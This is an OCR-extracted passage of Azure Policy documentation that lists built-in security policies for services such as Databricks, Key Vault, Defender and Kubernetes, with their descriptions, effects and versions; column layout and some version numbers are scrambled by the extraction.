Audit, Deny, Disabled 


access-during-account-creation. 


Disabling public IP of clusters in Azure Databricks 
Workspaces improves security by ensuring that the clusters 
aren't exposed on the public internet. Learn more at: 
https://learn.microsoft.com/azure/databricks/security/secure- 
cluster-connectivity. 


Audit, Deny, Disabled 


Azure Virtual Networks provide enhanced security and 
isolation for your Azure Databricks Workspaces, as well as 
subnets, access control policies, and other features to further 
restrict access. Learn more at: 
https://docs.microsoft.com/azure/databricks/administration- 
guide/cloud-configurations/azure/vnet-inject. 


Audit, Deny, Disabled 


Version 


(GitHub) 


1.10% 


TAO 


3.0.0 7 


1.0.02 


20.02 


1.1.0¢ 


1.0.07 


10.12 


10.22 


Policy name 


(Azure portal) 


Azure Databricks 
Workspaces should 
disable public 
network access E 


Azure Databricks 
Workspaces should 
use private link? 


Azure DDoS 
Protection Standard 
should be enabled € 


Azure Defender for 
App Service should be 
enabled Z 


Azure Defender for 
Azure SQL Database 
servers should be 
enabled zZ 


Azure Defender for 
DNS should be 
enabled 7 


Azure Defender for 
Key Vault should be 
enabled zZ 


Azure Defender for 
open-source 
relational databases 
should be enabled zZ 


Azure Defender for 
Resource Manager 


Description 


Disabling public network access improves security by 
ensuring that the resource isn't exposed on the public 
internet. You can control exposure of your resources by 
creating private endpoints instead. Learn more at: 
https://learn.microsoft.com/azure/databricks/administration- 
guide/cloud-configurations/azure/private-link. 


Azure Private Link lets you connect your virtual networks to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
Azure Databricks workspaces, you can reduce data leakage 
risks. Learn more about private links at: 
https://aka.ms/adbpe Z. 


DDoS protection standard should be enabled for all virtual 
networks with a subnet that is part of an application gateway 
with a public IP. 


Azure Defender for App Service leverages the scale of the 
cloud, and the visibility that Azure has as a cloud provider, to 
monitor for common web app attacks. 


Azure Defender for SQL provides functionality for surfacing 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 
databases, and discovering and classifying sensitive data. 


Azure Defender for DNS provides an additional layer of 
protection for your cloud resources by continuously 
monitoring all DNS queries from your Azure resources. Azure 
Defender alerts you about suspicious activity at the DNS 
layer. Learn more about the capabilities of Azure Defender 
for DNS at https://aka.ms/defender-for-dns £ . Enabling this 
Azure Defender plan results in charges. Learn about the 
pricing details per region on Security Center's pricing page: 
https://aka.ms/pricing-security-center £ . 


Azure Defender for Key Vault provides an additional layer of 
protection and security intelligence by detecting unusual and 
potentially harmful attempts to access or exploit key vault 
accounts. 


Azure Defender for open-source relational databases detects 
anomalous activities indicating unusual and potentially 
harmful attempts to access or exploit databases. Learn more 
about the capabilities of Azure Defender for open-source 
relational databases at 
https://aka.ms/AzDforOpenSourceDBsDocu E, Important: 
Enabling this plan will result in charges for protecting your 
open-source relational databases. Learn about the pricing on 
Security Center's pricing page: https://aka.ms/pricing- 
security-center E 


Azure Defender for Resource Manager automatically 
monitors the resource management operations in your 


Effect(s) 


Audit, Deny, Disabled 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Version 


(GitHub) 


LOTE 


1.0.2 


3.0.02 


1.03¢ 


102¢ 


1.0.07 


1,032 


1.0.0 4 


1.0.07 


Policy name 


(Azure portal) 


should be enabled Z 


Azure Defender for 
servers should be 
enabled # 


Azure Defender for 
SQL servers on 
machines should be 
enabled Z 


Azure Defender for 
SQL should be 
enabled for 
unprotected Azure 
SQL servers E 


Azure Defender for 
SQL should be 
enabled for 
unprotected SQL 
Managed Instances Z 


Azure Event Grid 
domains should use 
private link & 


Azure Event Grid 
topics should use 
private link Z 


Azure Key Vault 
should have firewall 
enabled 7 


Azure Key Vaults 
should use private 
link Z 


Description Effect(s) Version 


(GitHub) 


organization. Azure Defender detects threats and alerts you 
about suspicious activity. Learn more about the capabilities 
of Azure Defender for Resource Manager at 
https://aka.ms/defender-for-resource-manager Z . Enabling 
this Azure Defender plan results in charges. Learn about the 
pricing details per region on Security Center's pricing page: 
https://aka.ms/pricing-security-center @ . 


Azure Defender for servers provides real-time threat AuditlfNotExists, Disabled 1.0.37 
protection for server workloads and generates hardening 


recommendations as well as alerts about suspicious activities. 


Azure Defender for SQL provides functionality for surfacing AuditlfNotExists, Disabled 1.0.2 7 
and mitigating potential database vulnerabilities, detecting 
anomalous activities that could indicate threats to SQL 


databases, and discovering and classifying sensitive data. 


Audit SQL servers without Advanced Data Security AuditlfNotExists, Disabled 2.0.1 Z 


Audit each SQL Managed Instance without advanced data AuditlfNotExists, Disabled 1022 


security. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.2 2 
Azure services without a public IP address at the source or 

destination. The Private Link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Event Grid domain instead of the entire service, you'll 

also be protected against data leakage risks. Learn more at: 


https://aka.ms/privateendpoints £. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.2 
Azure services without a public IP address at the source or 

destination. The Private Link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Event Grid topic instead of the entire service, you'll also 

be protected against data leakage risks. Learn more at: 


https://aka.ms/privateendpoints £. 


Enable the key vault firewall so that the key vault is not dU e 
accessible by default to any public IPs. Optionally, you can 


configure specific IP ranges to limit access to those networks. 


Audit, Deny, Disabled 


Learn more at: https://docs.microsoft.com/azure/key- 
vault/general/network-security 


Azure Private Link lets you connect your virtual networks to 12.12 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 


connectivity between the consumer and services over the 


[parameters('audit_effect')] 


Azure backbone network. By mapping private endpoints to 


Policy name 


(Azure portal) 


Azure Kubernetes 
Service clusters 
should have Defender 
profile enabled tz 


Azure Machine 
Learning compute 
instances should be 
recreated to get the 
latest software 
updates 7 


Azure Machine 
Learning Computes 
should be in a virtual 
network E 


Azure Machine 
Learning Computes 
should have local 
authentication 
methods disabled # 


Azure Machine 
Learning workspaces 
should be encrypted 
with a customer- 
managed key # 


Azure Machine 
Learning Workspaces 
should disable public 
network access E 


Azure Machine 
Learning workspaces 
should use private 
link Z 


Description 


key vault, you can reduce data leakage risks. Learn more 
about private links at: https://aka.ms/akvprivatelink £ . 


Microsoft Defender for Containers provides cloud-native 
Kubernetes security capabilities including environment 
hardening, workload protection, and run-time protection. 
When you enable the SecurityProfile- AzureDefender on your 
Azure Kubernetes Service cluster, an agent is deployed to 
your cluster to collect security event data. Learn more about 
Microsoft Defender for Containers in 
https://docs.microsoft.com/azure/defender-for- 
cloud/defender-for-containers-introduction?tabs =defender- 
for-container-arch-aks 


Ensure Azure Machine Learning compute instances run on 
the latest available operating system. Security is improved 
and vulnerabilities reduced by running with the latest 
security patches. For more information, visit 
https://aka.ms/azureml-ci-updates/ E. 


Azure Virtual Networks provide enhanced security and 
isolation for your Azure Machine Learning Compute Clusters 


and Instances, as well as subnets, access control policies, and 


other features to further restrict access. When a compute is 
configured with a virtual network, it is not publicly 
addressable and can only be accessed from virtual machines 
and applications within the virtual network. 


Disabling local authentication methods improves security by 
ensuring that Machine Learning Computes require Azure 
Active Directory identities exclusively for authentication. 
Learn more at: https://aka.ms/azure-ml-aad-policy £ . 


Manage encryption at rest of Azure Machine Learning 
workspace data with customer-managed keys. By default, 
customer data is encrypted with service-managed keys, but 
customer-managed keys are commonly required to meet 
regulatory compliance standards. Customer-managed keys 
enable the data to be encrypted with an Azure Key Vault key 
created and owned by you. You have full control and 
responsibility for the key lifecycle, including rotation and 
management. Learn more at https://aka.ms/azureml- 
workspaces-cmk E. 


Disabling public network access improves security by 
ensuring that the Machine Learning Workspaces aren't 
exposed on the public internet. You can control exposure of 


your workspaces by creating private endpoints instead. Learn 


more at: https://learn.microsoft.com/azure/machine- 
learning/how-to-configure-private-link?view=azureml-api- 
2&tabs=azure-portal. 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 


Effect(s) 


Audit, Disabled 


[parameters(‘effects')] 


Audit, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Disabled 


Version 


(GitHub) 


201e 


1:0.3:2 


LO he 


2016 


1.03¢ 


20.12 


1.0.02 


Policy name 


(Azure portal) 


Azure MySQL flexible 
server should have 
Azure Active Directory 
Only Authentication 
enabled 7 


Azure Policy Add-on 
for Kubernetes service 
(AKS) should be 
installed and enabled 
on your clusters 7 


Azure Role-Based 
Access Control (RBAC) 
should be used on 
Kubernetes Services E 


Azure SignalR Service 
should use private 
link Z 


Azure Spring Cloud 
should use network 
injection 2 


Azure SQL Database 
should be running 
TLS version 1.2 or 
newer E 


Azure SQL Database 
should have Azure 
Active Directory Only 
Authentication 
enabled 7 


Azure SQL Managed 
Instance should have 
Azure Active Directory 
Only Authentication 
enabled Z 


Azure SQL Managed 
Instances should 


Baseripaidshone network. By mapping private endpoints to Version 
Azure Machine Learning workspaces, data leakage risks are 
reduced. Learn more about private links at: 
https://docs.microsoft.com/azure/machine-learning/how-to- 


configure-private-link. 


Effect(s) 


(GitHub) 


Disabling local authentication methods and allowing only AuditlfNotExists, Disabled 1.0.0 7 
Azure Active Directory Authentication improves security by 
ensuring that Azure MySQL flexible server can exclusively be 


accessed by Azure Active Directory identities. 


Azure Policy Add-on for Kubernetes service (AKS) extends 1.0.2¢ 
Gatekeeper v3, an admission controller webhook for Open 


Policy Agent (OPA), to apply at-scale enforcements and 


Audit, Disabled 


safeguards on your clusters in a centralized, consistent 
manner. 


To provide granular filtering on the actions that users can Audit, Disabled 1.03¢ 
perform, use Azure Role-Based Access Control (RBAC) to 
manage permissions in Kubernetes Service Clusters and 


configure relevant authorization policies. 


Azure Private Link lets you connect your virtual network to Audit, Disabled 1.0.02 
Azure services without a public IP address at the source or 

destination. The private link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network. By mapping private endpoints to 

your Azure SignalR Service resource instead of the entire 

service, you'll reduce your data leakage risks. Learn more 


about private links at: https://aka.ms/asrs/privatelink £Z . 


Azure Spring Cloud instances should use virtual network Audit, Disabled, Deny 1.2.0¢ 
injection for the following purposes: 1. Isolate Azure Spring 

Cloud from Internet. 2. Enable Azure Spring Cloud to interact 

with systems in either on premises data centers or Azure 

service in other virtual networks. 3. Empower customers to 

control inbound and outbound network communications for 


Azure Spring Cloud. 


Setting TLS version to 1.2 or newer improves security by 2.0.0 Z 
ensuring your Azure SQL Database can only be accessed 

from clients using TLS 1.2 or newer. Using versions of TLS 

less than 1.2 is not recommended since they have well 


documented security vulnerabilities. 


Audit, Disabled, Deny 


Disabling local authentication methods and allowing only Audit, Deny, Disabled 1.0.0¢ 
Azure Active Directory Authentication improves security by 

ensuring that Azure SQL Databases can exclusively be 

accessed by Azure Active Directory identities. Learn more at: 


aka.ms/adonlycreate. 


Disabling local authentication methods and allowing only Audit, Deny, Disabled 1.0.0¢ 
Azure Active Directory Authentication improves security by 

ensuring that Azure SQL Managed Instances can exclusively 

be accessed by Azure Active Directory identities. Learn more 


at: aka.ms/adonlycreate. 


Disabling public network access (public endpoint) on Azure Audit, Deny, Disabled 1.0.02 


SQL Managed Instances improves security by ensuring that 


Policy name 


(Azure portal) 


disable public 
network access E 


Azure Web 
Application Firewall 
should be enabled for 
Azure Front Door 
entry-points E 


Blocked accounts with 
owner permissions on 
Azure resources 

should be removed 7 


Blocked accounts with 
read and write 
permissions on Azure 
resources should be 
removed č 


Cognitive Services 
accounts should 
disable public 
network access E 


Cognitive Services 
accounts should 
enable data 
encryption with a 
customer-managed 
key E 


Cognitive Services 
accounts should have 
local authentication 
methods disabled # 


Cognitive Services 
accounts should 
restrict network 
access E 


Cognitive Services 
should use private 


Description 


they can only be accessed from inside their virtual networks 
or via Private Endpoints. To learn more about public network 
access, visit https://aka.ms/mi-public-endpoint £ . 


Deploy Azure Web Application Firewall (WAF) in front of 
public facing web applications for additional inspection of 
incoming traffic. Web Application Firewall (WAF) provides 
centralized protection of your web applications from 
common exploits and vulnerabilities such as SQL injections, 
Cross-Site Scripting, local and remote file executions. You can 
also restrict access to your web applications by countries, IP 
address ranges, and other http(s) parameters via custom 
rules. 


Deprecated accounts with owner permissions should be 
removed from your subscription. Deprecated accounts are 
accounts that have been blocked from signing in. 


Deprecated accounts should be removed from your 
subscriptions. Deprecated accounts are accounts that have 
been blocked from signing in. 


To improve the security of Cognitive Services accounts, 
ensure that it isn't exposed to the public internet and can 
only be accessed from a private endpoint. Disable the public 
network access property as described in 
https://go.microsoft.com/fwlink/?linkid=2 129800 £ . This 
option disables access from any public address space outside 
the Azure IP range, and denies all logins that match IP or 
virtual network-based firewall rules. This reduces data 
leakage risks. 


Customer-managed keys are commonly required to meet 
regulatory compliance standards. Customer-managed keys 
enable the data stored in Cognitive Services to be encrypted 
with an Azure Key Vault key created and owned by you. You 
have full control and responsibility for the key lifecycle, 
including rotation and management. Learn more about 
customer-managed keys at https://go.microsoft.com/fwlink/? 
linkid=2121321 Z. 


Disabling local authentication methods improves security by 
ensuring that Cognitive Services accounts require Azure 
Active Directory identities exclusively for authentication. 
Learn more at: https://aka.ms/cs/auth £ . 


Network access to Cognitive Services accounts should be 
restricted. Configure network rules so only applications from 
allowed networks can access the Cognitive Services account. 
To allow connections from specific internet or on-premises 
clients, access can be granted to traffic from specific Azure 
virtual networks or to public internet IP address ranges. 


Azure Private Link lets you connect your virtual networks to 
Azure services without a public IP address at the source or 


Effect(s) 


Audit, Deny, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Deny, Disabled 


Audit, Disabled 


Version 


(GitHub) 


1.0.24 


1.0.07 


1.0.0 4 


3.0.1 2 


2.1.04 


1.0.0 2 


3.0.0 7 


3.0.0 2 


Policy name 
(Azure portal) 


link Z 


Container registries 
should be encrypted 
with a customer- 
managed key Si 


Container registries 
should not allow 
unrestricted network 
access E 


Container registries 
should use private 
link 2 


Container registry 
images should have 
vulnerability findings 
resolved 7 


Container registry 
images should have 
vulnerability findings 
resolved (powered by 
Microsoft Defender 
Vulnerability 
Management) Z 


Cosmos DB database 
accounts should have 
local authentication 
methods disabled tz 


Description Effect(s) 


destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
Cognitive Services, you'll reduce the potential for data 
leakage. Learn more about private links at: 
https://go.microsoft.com/fwlink/?linkid=2129800 Z . 


Use customer-managed keys to manage the encryption at Audit, Deny, Disabled 
rest of the contents of your registries. By default, the data is 

encrypted at rest with service-managed keys, but customer- 

managed keys are commonly required to meet regulatory 

compliance standards. Customer-managed keys enable the 

data to be encrypted with an Azure Key Vault key created 

and owned by you. You have full control and responsibility 

for the key lifecycle, including rotation and management. 

Learn more at https://aka.ms/acr/CMK Z. 


Azure container registries by default accept connections over Audit, Deny, Disabled 
the internet from hosts on any network. To protect your 

registries from potential threats, allow access from only 

specific private endpoints, public IP addresses or address 

ranges. If your registry doesn't have network rules 

configured, it will appear in the unhealthy resources. Learn 

more about Container Registry network rules here: 

https://aka.ms/acr/privatelink, 7 

https://aka.ms/acr/portal/public-network £ and 

https://aka.ms/acr/vnet Z . 


Azure Private Link lets you connect your virtual network to Audit, Disabled 
Azure services without a public IP address at the source or 

destination. The private link platform handles the 

connectivity between the consumer and services over the 

Azure backbone network.By mapping private endpoints to 

your container registries instead of the entire service, you'll 

also be protected against data leakage risks. Learn more at: 
https://aka.ms/acr/private-link Z . 


Container image vulnerability assessment scans your registry AuditlfNotExists, Disabled 
for security vulnerabilities and exposes detailed findings for 

each image. Resolving the vulnerabilities can greatly improve 

your containers’ security posture and protect them from 

attacks. 


Container image vulnerability assessment scans your registry AuditlfNotExists, Disabled 
for commonly known vulnerabilities (CVEs) and provides a 

detailed vulnerability report for each image. Resolving 

vulnerabilities can greatly improve your security posture, 

ensuring images are safe to use prior to deployment. 


Disabling local authentication methods improves security by Audit, Deny, Disabled 
ensuring that Cosmos DB database accounts exclusively 

require Azure Active Directory identities for authentication. 

Learn more at: https://docs.microsoft.com/azure/cosmos- 
db/how-to-setup-rbac#disable-local-auth. 


Version 


(GitHub) 


(bb 


2.0.0 2 


1.0.1 2 


201 


1.0.07 


1.1.0¢ 


Policy name 


(Azure portal) 


CosmosDB accounts 
should use private 
link 2 


Email notification for 
high severity alerts 
should be enabled € 


Email notification to 
subscription owner 
for high severity alerts 
should be enabled Z 


Endpoint protection 
health issues should 
be resolved on your 
machines Z 


Endpoint protection 
should be installed on 
your machines 6 


Endpoint protection 
solution should be 
installed on virtual 
machine scale sets 7 


Enforce SSL 
connection should be 
enabled for MySQL 
database servers E 


Enforce SSL 
connection should be 
enabled for 
PostgreSQL database 
servers E 


Description 


Azure Private Link lets you connect your virtual network to 
Azure services without a public IP address at the source or 
destination. The Private Link platform handles the 
connectivity between the consumer and services over the 
Azure backbone network. By mapping private endpoints to 
your CosmosDB account, data leakage risks are reduced. 
Learn more about private links at: 
https://docs.microsoft.com/azure/cosmos-db/how-to- 
configure-private-endpoints. 


To ensure the relevant people in your organization are 
notified when there is a potential security breach in one of 
your subscriptions, enable email notifications for high 
severity alerts in Security Center. 


To ensure your subscription owners are notified when there 
is a potential security breach in their subscription, set email 


notifications to subscription owners for high severity alerts in 


Security Center. 


Resolve endpoint protection health issues on your virtual 
machines to protect them from latest threats and 
vulnerabilities. Azure Security Center supported endpoint 
protection solutions are documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-services?tabs=features-windows#supported- 
endpoint-protection-solutions. Endpoint protection 
assessment is documented here - 
https://docs.microsoft.com/azure/security-center/security- 
center-endpoint-protection. 


To protect your machines from threats and vulnerabilities, 
install a supported endpoint protection solution. 


Audit the existence and health of an endpoint protection 
solution on your virtual machines scale sets, to protect them 
from threats and vulnerabilities. 


Azure Database for MySQL supports connecting your Azure 
Database for MySQL server to client applications using 
Secure Sockets Layer (SSL). Enforcing SSL connections 
between your database server and your client applications 
helps protect against 'man in the middle’ attacks by 
encrypting the data stream between the server and your 
application. This configuration enforces that SSL is always 
enabled for accessing your database server. 


Azure Database for PostgreSQL supports connecting your 
Azure Database for PostgreSQL server to client applications 
using Secure Sockets Layer (SSL). Enforcing SSL connections 
between your database server and your client applications 
helps protect against 'man in the middle’ attacks by 
encrypting the data stream between the server and your 
application. This configuration enforces that SSL is always 
enabled for accessing your database server. 


Effect(s) 


Audit, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


AuditlfNotExists, Disabled 


Audit, Disabled 


Audit, Disabled 


Version 


(GitHub) 


1.0.0 4 


10.1 


2.0.0 Z 


1.0.0 4 


1.0.0 2 


3.0.0 Z 


1.0.1¢ 


10.17 


Policy name 


(Azure portal) 


Function apps should 
have ‘Client 
Certificates (Incoming 
client certificates)’ 
enabled Z 


Function apps should 
have remote 
debugging turned off Z 


Function apps should 
not have CORS 
configured to allow 
every resource to 
access your apps 4 


Function apps should 
only be accessible 
over HTTPS Z 


Function apps should 
require FTPS only Z 


Function apps should 
use managed identity E 


Function apps should 
use the latest TLS 
version č 


Geo-redundant 

backup should be 
enabled for Azure 
Database for MariaDB Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for MySQL Z 


Geo-redundant 
backup should be 
enabled for Azure 
Database for 
PostgreSQL E 


Guest accounts with 
owner permissions on 


Description 


Client certificates allow for the app to request a certificate for 
incoming requests. Only clients with valid certificates will be 
able to reach the app. 


Remote debugging requires inbound ports to be opened on 
Function apps. Remote debugging should be turned off. 


Cross-Origin Resource Sharing (CORS) should not allow all 
domains to access your Function app. Allow only required 
domains to interact with your Function app. 


Use of HTTPS ensures server/service authentication and 
protects data in transit from network layer eavesdropping 
attacks. 


Enable FTPS enforcement for enhanced security. 


Use a managed identity for enhanced authentication security 


Periodically, newer versions are released for TLS either due to 
security flaws, include additional functionality, and enhance 
speed. Upgrade to the latest TLS version for Function apps to 
take advantage of security fixes, if any, and/or new 
functionalities of the latest version. 


Azure Database for MariaDB allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


Azure Database for MySQL allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


Azure Database for PostgreSQL allows you to choose the 
redundancy option for your database server. It can be set to 
a geo-redundant backup storage in which the data is not 
only stored within the region in which your server is hosted, 
but is also replicated to a paired region to provide recovery 
option in case of a region failure. Configuring geo-redundant 
storage for backup is only allowed during server create. 


External accounts with owner permissions should be 
removed from your subscription in order to prevent 


Effect(s) Version 


(GitHub) 


Audit, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 2.0.0 Z 


AuditlfNotExists, Disabled 2.0.0 Z 


Audit, Disabled, Deny 5.0.0 Z 


AuditlfNotExists, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 3.0.0 Z 


AuditlfNotExists, Disabled 2.0.1 Z 


Audit, Disabled 1.0.1 
Audit, Disabled 1.0.1 
Audit, Disabled 1.0.1 4 


AuditlfNotExists, Disabled 1.0.07 


Policy name 


(Azure portal) 


Azure resources 
should be removed Z 


Guest accounts with 
read permissions on 
Azure resources 
should be removed 7 


Guest accounts with 
write permissions on 
Azure resources 
should be removed 7 


Guest Configuration 
extension should be 
installed on your 
machines E 


Internet-facing virtual 
machines should be 
protected with 
network security 
groups E 


IP Forwarding on your 
virtual machine 
should be disabled 7 


Key Vault keys should 
have an expiration 
date 7 


Key Vault secrets 
should have an 
expiration date 7 


Key vaults should 
have deletion 
protection enabled ¢ 


Key vaults should 
have soft delete 


Description Effect(s) Version 


(GitHub) 


unmonitored access. 


External accounts with read privileges should be removed AuditlfNotExists, Disabled 1.0.0 7 
from your subscription in order to prevent unmonitored 


access. 


External accounts with write privileges should be removed AuditlfNotExists, Disabled 1.0.07 
from your subscription in order to prevent unmonitored 


access. 


To ensure secure configurations of in-guest settings of your AuditlfNotExists, Disabled 1.0.37 
machine, install the Guest Configuration extension. In-guest 

settings that the extension monitors include the 

configuration of the operating system, application 

configuration or presence, and environment settings. Once 

installed, in-guest policies will be available such as 'Windows 

Exploit guard should be enabled’. Learn more at 


https://aka.ms/gcpol £ . 


Protect your virtual machines from potential threats by AuditlfNotExists, Disabled 3.0.0 
restricting access to them with network security groups 
(NSG). Learn more about controlling traffic with NSGs at 


https://aka.ms/nsg-doc E 


Enabling IP forwarding on a virtual machine's NIC allows the 3.0.0 £ 


machine to receive traffic addressed to other destinations. IP 


AuditlfNotExists, Disabled 


forwarding is rarely required (e.g., when using the VM as a 
network virtual appliance), and therefore, this should be 
reviewed by the network security team. 


Cryptographic keys should have a defined expiration date 10.22 


and not be permanent. Keys that are valid forever provide a 


Audit, Deny, Disabled 


potential attacker with more time to compromise the key. It 
is a recommended security practice to set expiration dates 
on cryptographic keys. 

Secrets should have a defined expiration date and not be Audit, Deny, Disabled 10.2 2 
permanent. Secrets that are valid forever provide a potential 

attacker with more time to compromise them. It is a 

recommended security practice to set expiration dates on 


secrets. 


Malicious deletion of a key vault can lead to permanent data Audit, Deny, Disabled 2.1.0% 
loss. You can prevent permanent data loss by enabling purge 

protection and soft delete. Purge protection protects you 

from insider attacks by enforcing a mandatory retention 

period for soft deleted key vaults. No one inside your 

organization or Microsoft will be able to purge your key 

vaults during the soft delete retention period. Keep in mind 

that key vaults created after September 1st 2019 have soft- 


delete enabled by default. 


Deleting a key vault without soft delete enabled permanently 3.0.0 4 


deletes all secrets, keys, and certificates stored in the key 


Audit, Deny, Disabled 


Policy name 
(Azure portal) 


enabled zZ 


Kubernetes cluster 
containers CPU and 
memory resource 
limits should not 
exceed the specified 
limits £ 


Kubernetes cluster 
containers should not 
share host process ID 
or host IPC 
namespace & 


Kubernetes cluster 
containers should 
only use allowed 
AppArmor profiles E 


Kubernetes cluster 
containers should 
only use allowed 
capabilities E 


Kubernetes cluster 
containers should 
only use allowed 
images E 


Kubernetes cluster 
containers should run 
with a read only root 
file system Z 


Kubernetes cluster 
pod hostPath volumes 
should only use 
allowed host paths E 


Kubernetes cluster 
pods and containers 
should only run with 


Description 


vault. Accidental deletion of a key vault can lead to 
permanent data loss. Soft delete allows you to recover an 
accidentally deleted key vault for a configurable retention 
period. 


Enforce container CPU and memory resource limits to 
prevent resource exhaustion attacks in a Kubernetes cluster. 
This policy is generally available for Kubernetes Service (AKS), 
and preview for Azure Arc enabled Kubernetes. For more 
information, see https://aka.ms/kubepolicydoc £ . 


Block pod containers from sharing the host process ID 
namespace and host IPC namespace in a Kubernetes cluster. 
This recommendation is part of CIS 5.2.2 and CIS 5.2.3 which 
are intended to improve the security of your Kubernetes 
environments. This policy is generally available for 
Kubernetes Service (AKS), and preview for Azure Arc enabled 
Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Containers should only use allowed AppArmor profiles in a 
Kubernetes cluster. This policy is generally available for 
Kubernetes Service (AKS), and preview for Azure Arc enabled 
Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Restrict the capabilities to reduce the attack surface of 
containers in a Kubernetes cluster. This recommendation is 
part of CIS 5.2.8 and CIS 5.2.9 which are intended to improve 
the security of your Kubernetes environments. This policy is 
generally available for Kubernetes Service (AKS), and preview 
for Azure Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Use images from trusted registries to reduce the Kubernetes 
cluster's exposure risk to unknown vulnerabilities, security 
issues and malicious images. This policy is generally available 
for Kubernetes Service (AKS), and preview for Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Run containers with a read only root file system to protect 
from changes at run-time with malicious binaries being 
added to PATH in a Kubernetes cluster. This policy is 
generally available for Kubernetes Service (AKS), and preview 
for Azure Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Limit pod HostPath volume mounts to the allowed host 
paths in a Kubernetes Cluster. This policy is generally 
available for Kubernetes Service (AKS), and Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Control the user, primary group, supplemental group and file 
system group IDs that pods and containers can use to run in 
a Kubernetes Cluster. This policy is generally available for 


Effect(s) 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


audit, Audit, deny, Deny, 
disabled, Disabled 


Version 


(GitHub) 


9.1.02 


5.1.07 


6.1.12 


6.1.07 


9.107 


6.1.07 


6.1.12 


6.1.12 


Policy name 
(Azure portal) 


approved user and 
group IDs £ 


Kubernetes cluster 
pods should only use 
approved host 
network and port 
range č 


Kubernetes cluster 
services should listen 
only on allowed ports E 


Kubernetes cluster 
should not allow 
privileged containers E 


Kubernetes clusters 
should be accessible 
only over HTTPS Z 


Kubernetes clusters 
should disable 
automounting API 
credentials 7 


Kubernetes clusters 
should not allow 
container privilege 
escalation 7 


Kubernetes clusters 
should not grant 
CAP_SYS_ADMIN 
security capabilities 7 


Kubernetes clusters 
should not use the 
default namespace 2 


Linux machines 
should have Log 


Description 


Kubernetes Service (AKS), and preview for Azure Arc enabled 


Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Restrict pod access to the host network and the allowable 
host port range in a Kubernetes cluster. This 
recommendation is part of CIS 5.2.4 which is intended to 


improve the security of your Kubernetes environments. This 
policy is generally available for Kubernetes Service (AKS), and 


preview for Azure Arc enabled Kubernetes. For more 
information, see https://aka.ms/kubepolicydoc £ . 


Restrict services to listen only on allowed ports to secure 
access to the Kubernetes cluster. This policy is generally 


available for Kubernetes Service (AKS), and preview for Azure 


Arc enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Do not allow privileged containers creation in a Kubernetes 
cluster. This recommendation is part of CIS 5.2.1 which is 
intended to improve the security of your Kubernetes 
environments. This policy is generally available for 


Kubernetes Service (AKS), and preview for Azure Arc enabled 


Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Use of HTTPS ensures authentication and protects data in 
transit from network layer eavesdropping attacks. This 
capability is currently generally available for Kubernetes 
Service (AKS), and in preview for Azure Arc enabled 


Kubernetes. For more info, visit https://aka.ms/kubepolicydoc ¢ 


Disable automounting API credentials to prevent a 


potentially compromised Pod resource to run API commands 


against Kubernetes clusters. For more information, see 
https://aka.ms/kubepolicydoc £ . 


Do not allow containers to run with privilege escalation to 


root in a Kubernetes cluster. This recommendation is part of 


CIS 5.2.5 which is intended to improve the security of your 
Kubernetes environments. This policy is generally available 
for Kubernetes Service (AKS), and preview for Azure Arc 
enabled Kubernetes. For more information, see 
https://aka.ms/kubepolicydoc £ . 


To reduce the attack surface of your containers, restrict 
CAP_SYS_ADMIN Linux capabilities. For more information, 
see https://aka.ms/kubepolicydoc Z . 


Prevent usage of the default namespace in Kubernetes 
clusters to protect against unauthorized access for 
ConfigMap, Pod, Secret, Service, and ServiceAccount 
resource types. For more information, see 
https://aka.ms/kubepolicydoc Z . 


Machines are non-compliant if Log Analytics agent is not 
